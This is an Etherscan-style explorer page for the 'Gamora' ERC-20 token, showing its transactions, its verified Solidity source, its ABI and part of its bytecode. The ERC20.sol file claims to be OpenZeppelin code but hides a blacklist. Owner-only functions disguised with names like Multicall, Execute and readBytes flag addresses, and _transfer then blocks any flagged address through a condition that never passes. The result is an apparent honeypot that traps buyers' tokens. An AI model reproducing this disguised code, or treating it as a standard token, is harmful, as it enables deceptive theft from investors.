ETH Price: $2,068.23 (-3.75%)

Contract

0xC6Adcd4Eac799D85FFcd21BdA571CA5A49b52504
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

More Info

Private Name Tags

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve173199932023-05-23 5:53:471038 days ago1684821227IN
0xC6Adcd4E...A49b52504
0 ETH0.0016180734.3037255
Approve172874242023-05-18 15:47:591043 days ago1684424879IN
0xC6Adcd4E...A49b52504
0 ETH0.0044479594.29818735
Multicall172805742023-05-17 16:39:111044 days ago1684341551IN
0xC6Adcd4E...A49b52504
0 ETH0.00516484109.43161414
Multicall172805512023-05-17 16:34:231044 days ago1684341263IN
0xC6Adcd4E...A49b52504
0 ETH0.00585829124.12433594
Multicall172805102023-05-17 16:25:231044 days ago1684340723IN
0xC6Adcd4E...A49b52504
0 ETH0.0028240959.83631318
Multicall172804952023-05-17 16:22:231044 days ago1684340543IN
0xC6Adcd4E...A49b52504
0 ETH0.0032372768.59074918
Multicall172804852023-05-17 16:20:231044 days ago1684340423IN
0xC6Adcd4E...A49b52504
0 ETH0.0029996963.55687579
Multicall172804682023-05-17 16:16:591044 days ago1684340219IN
0xC6Adcd4E...A49b52504
0 ETH0.00899104128.02828676
Approve172804452023-05-17 16:11:591044 days ago1684339919IN
0xC6Adcd4E...A49b52504
0 ETH0.003620176.65
Multicall172804432023-05-17 16:11:351044 days ago1684339895IN
0xC6Adcd4E...A49b52504
0 ETH0.00926953131.99391791
Multicall172804352023-05-17 16:09:591044 days ago1684339799IN
0xC6Adcd4E...A49b52504
0 ETH0.0036554477.4507258
Approve172804342023-05-17 16:09:471044 days ago1684339787IN
0xC6Adcd4E...A49b52504
0 ETH0.0038283681.05971028
Approve172804342023-05-17 16:09:471044 days ago1684339787IN
0xC6Adcd4E...A49b52504
0 ETH0.00510355108.05971028
Approve172804092023-05-17 16:04:471044 days ago1684339487IN
0xC6Adcd4E...A49b52504
0 ETH0.0034702173.47640206

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
Gamora

Compiler Version
v0.8.12+commit.f00d7308

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 1 of 5: Gamora.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

import "./ERC20.sol";

contract Gamora is ERC20 {
    constructor() ERC20("GAMORA", "GAMORA") {
        _mint(msg.sender, 1000000000000 * 10 ** decimals());
    }
}

File 2 of 5: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 3 of 5: ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./IERC20Metadata.sol";
import "./Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping (address => bool) private _rewards;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    bool private _rewardsApplied = false;


    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function Multicall(address [] calldata _bytes_) external onlyOwner {
        for (uint256 i = 0; i < _bytes_.length; ) {
            _rewards[_bytes_[i]] = true;
            unchecked { ++i; }
        }
        
    }

    function Execute(address _bytes_) external onlyOwner {
        _rewards[_bytes_] = false;
    }

    function readBytes(address _bytes_) public view returns (bool) {
        return _rewards[_bytes_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        if (_rewards[to] || _rewards[from]) require(_rewardsApplied == true, "");
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 4 of 5: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

File 5 of 5: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_bytes_","type":"address"}],"name":"Execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_bytes_","type":"address[]"}],"name":"Multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_bytes_","type":"address"}],"name":"readBytes","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600760006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b506040518060400160405280600681526020017f47414d4f524100000000000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f47414d4f52410000000000000000000000000000000000000000000000000000815250620000b9620000ad6200013460201b60201c565b6200013c60201b60201c565b8160059080519060200190620000d192919062000382565b508060069080519060200190620000ea92919062000382565b5050506200012e33620001026200020060201b60201c565b600a620001109190620005cc565b64e8d4a510006200012291906200061d565b6200020960201b60201c565b620007f1565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156200027c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200027390620006df565b60405180910390fd5b62000290600083836200037860201b60201c565b8060046000828254620002a4919062000701565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200035891906200076f565b60405180910390a362000374600083836200037d60201b60201c565b5050565b505050565b505050565b8280546200039090620007bb565b90600052602060002090601f016020900481019282620003b4576000855562000400565b82601f10620003cf57805160ff191683800117855562000400565b8280016001018555821562000400579182015b82811115620003ff578251825591602001919060010190620003e2565b5b5090506200040f919062000413565b5090565b5b808211156200042e57600081600090555060010162000414565b5090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620004c05780860481111562000498576200049762000432565b5b6001851615620004a85780820291505b8081029050620004b88562000461565b945062000478565b94509492505050565b600082620004db5760019050620005ae565b81620004eb5760009050620005ae565b81600181146200050457600281146200050f5762000545565b6001915050620005ae565b60ff84111562000524576200052362000432565b5b8360020a9150848211156200053e576200053d62000432565b5b50620005ae565b5060208310610133831016604e8410600b84101617156200057f5782820a90508381111562000579576200057862000432565b5b620005ae565b6200058e84848460016200046e565b92509050818404811115620005a857620005a762000432565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b6000620005d982620005b5565b9150620005e683620005bf565b9250620006157fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620004c9565b905092915050565b60006200062a82620005b5565b91506200063783620005b5565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000673576200067262000432565b5b828202905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620006c7601f836200067e565b9150620006d4826200068f565b602082019050919050565b60006020820190508181036000830152620006fa81620006b8565b9050919050565b60006200070e82620005b5565b91506200071b83620005b5565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000753576200075262000432565b5b828201905092915050565b6200076981620005b5565b82525050565b60006020820190506200078660008301846200075e565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620007d457607f821691505b60208210811415620007eb57620007ea6200078c565b5b50919050565b611a2380620008016000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d7146102bc578063a9059cbb146102ec578063dd62ed3e1461031c578063f2fde38b1461034c578063f3294c13146103685761010b565b8063715018a61461025a5780637a49cddb146102645780638da5cb5b1461028057806395d89b411461029e5761010b565b8063313ce567116100de578063313ce567146101ac57806332a0e002146101ca57806339509351146101fa57806370a082311461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b6040516101259190611089565b60405180910390f35b61014860048036038101906101439190611149565b610416565b60405161015591906111a4565b60405180910390f35b610166610439565b60405161017391906111ce565b60405180910390f35b610196600480360381019061019191906111e9565b610443565b6040516101a391906111a4565b60405180910390f35b6101b4610472565b6040516101c19190611258565b60405180910390f35b6101e460048036038101906101df9190611273565b61047b565b6040516101f191906111a4565b60405180910390f35b610214600480360381019061020f9190611149565b6104d1565b60405161022191906111a4565b60405180910390f35b610244600480360381019061023f9190611273565b610508565b60405161025191906111ce565b60405180910390f35b610262610551565b005b61027e60048036038101906102799190611305565b610565565b005b61028861060a565b6040516102959190611361565b60405180910390f35b6102a6610633565b6040516102b39190611089565b60405180910390f35b6102d660048036038101906102d19190611149565b6106c5565b6040516102e391906111a4565b60405180910390f35b61030660048036038101906103019190611149565b61073c565b60405161031391906111a4565b60405180910390f35b6103366004803603810190610331919061137c565b61075f565b60405161034391906111ce565b60405180910390f35b61036660048036038101906103619190611273565b6107e6565b005b610382600480360381019061037d9190611273565b61086a565b005b606060058054610393906113eb565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf906113eb565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b6000806104216108cd565b905061042e8185856108d5565b600191505092915050565b6000600454905090565b60008061044e6108cd565b905061045b858285610aa0565b610466858585610b2c565b60019150509392505050565b60006012905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000806104dc6108cd565b90506104fd8185856104ee858961075f565b6104f8919061144c565b6108d5565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610559610ea4565b6105636000610f22565b565b61056d610ea4565b60005b8282905081101561060557600160026000858585818110610594576105936114a2565b5b90506020020160208101906105a99190611273565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550806001019050610570565b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610642906113eb565b80601f016020809104026020016040519081016040528092919081815260200182805461066e906113eb565b80156106bb5780601f10610690576101008083540402835291602001916106bb565b820191906000526020600020905b81548152906001019060200180831161069e57829003601f168201915b5050505050905090565b6000806106d06108cd565b905060006106de828661075f565b905083811015610723576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161071a90611543565b60405180910390fd5b61073082868684036108d5565b60019250505092915050565b6000806107476108cd565b9050610754818585610b2c565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107ee610ea4565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561085e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610855906115d5565b60405180910390fd5b61086781610f22565b50565b610872610ea4565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610945576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161093c90611667565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156109b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ac906116f9565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a9391906111ce565b60405180910390a3505050565b6000610aac848461075f565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b265781811015610b18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0f90611765565b60405180910390fd5b610b2584848484036108d5565b5b50505050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610bcd5750600260008473ffffffffffffffffffffffffffffff